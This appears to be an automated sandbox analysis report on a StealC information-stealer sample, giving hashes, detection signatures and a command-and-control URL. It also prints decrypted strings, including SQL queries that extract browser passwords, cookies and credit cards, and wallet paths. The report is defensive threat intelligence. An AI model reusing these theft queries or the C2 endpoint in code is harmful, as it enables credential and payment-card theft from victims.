Edit tour

Windows Analysis Report
X4roU7TtF1.exe

Overview

General Information

Sample name:	X4roU7TtF1.exe renamed because original name is a hash value
Original sample name:	73adcb1012b382b6194c34b5cf277c9e.exe
Analysis ID:	1562757
MD5:	73adcb1012b382b6194c34b5cf277c9e
SHA1:	d4f2a95a5e37a2af9a12367d2c2a1938e3ca7c55
SHA256:	4a1c3bd9ad6059315a24b7bbb2cd9d6164375555e41a7bfe2ca2353b54f4a32f
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

X4roU7TtF1.exe (PID: 2528 cmdline: "C:\Users\user\Desktop\X4roU7TtF1.exe" MD5: 73ADCB1012B382B6194C34B5CF277C9E)

WerFault.exe (PID: 2820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1076 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: StealC

{"C2 url": "http://92.255.57.88/7bbacc20a3bd2eb5.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2192748426.0000000000760000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7581:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.2109975602.0000000000850000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: X4roU7TtF1.exe PID: 2528	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: X4roU7TtF1.exe PID: 2528	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.X4roU7TtF1.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.X4roU7TtF1.exe.850000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.X4roU7TtF1.exe.810e67.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.X4roU7TtF1.exe.850000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.X4roU7TtF1.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T00:12:04.230634+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49707	92.255.57.88	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: X4roU7TtF1.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://92.255.57.88/7bbacc20a3bd2eb5.php"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: X4roU7TtF1.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: 26
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: 11
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: 20
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: 24
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: lstrcatA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: OpenEventA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CreateEventA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CloseHandle
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Sleep
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: VirtualFree
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: lstrlenA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: ExitProcess
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: user32.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CreateDCA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: sscanf
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: HAL9TH
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: JohnDoe
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: DISPLAY
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: http://92.255.57.88
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: /7bbacc20a3bd2eb5.php
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: /7550b1c08332241a/
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: 551488411
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: HeapFree
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetFileSize
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GlobalSize
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Process32Next
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Process32First
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: LocalFree
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: FindClose
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: ReadFile
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: WriteFile
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CreateFileA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CopyFileA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetLastError
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GlobalFree
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: OpenProcess
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: ole32.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: wininet.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: shell32.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SelectObject
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: BitBlt
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: DeleteObject
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GdipFree
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CoInitialize
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetDC
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CloseWindow
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: wsprintfA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CharToOemW
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: wsprintfW
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: StrStrA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: StrCmpCW
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: PathMatchSpecA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: RmStartSession
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: RmRegisterResources
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: RmGetList
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: RmEndSession
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: sqlite3_open
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: sqlite3_step
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: sqlite3_column_text
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: sqlite3_finalize
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: sqlite3_close
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: encrypted_key
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: PATH
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: NSS_Init
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: NSS_Shutdown
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: PK11_Authenticate
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: C:\ProgramData\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: browser:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: profile:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: url:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: login:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: password:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Opera
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: OperaGX
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Network
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: cookies
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: .txt
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: TRUE
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: FALSE
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: autofill
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: history
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: cc
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: name:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: month:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: year:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: card:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Cookies
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Login Data
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Web Data
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: History
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: logins.json
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: formSubmitURL
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: usernameField
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: encryptedUsername
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: encryptedPassword
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: guid
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: cookies.sqlite
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: formhistory.sqlite
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: places.sqlite
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: plugins
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Local Extension Settings
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Sync Extension Settings
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: IndexedDB
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Opera Stable
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Opera GX Stable
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: CURRENT
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: chrome-extension_
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Local State
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: profiles.ini
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: chrome
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: opera
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: firefox
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: wallets
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: ProductName
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: x32
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: x64
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: DisplayName
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: DisplayVersion
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Network Info:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - IP: IP?
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Country: ISO?
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: System Summary:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - HWID:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - OS:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Architecture:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - UserName:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Computer Name:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Local Time:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - UTC:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Language:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Keyboards:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Laptop:
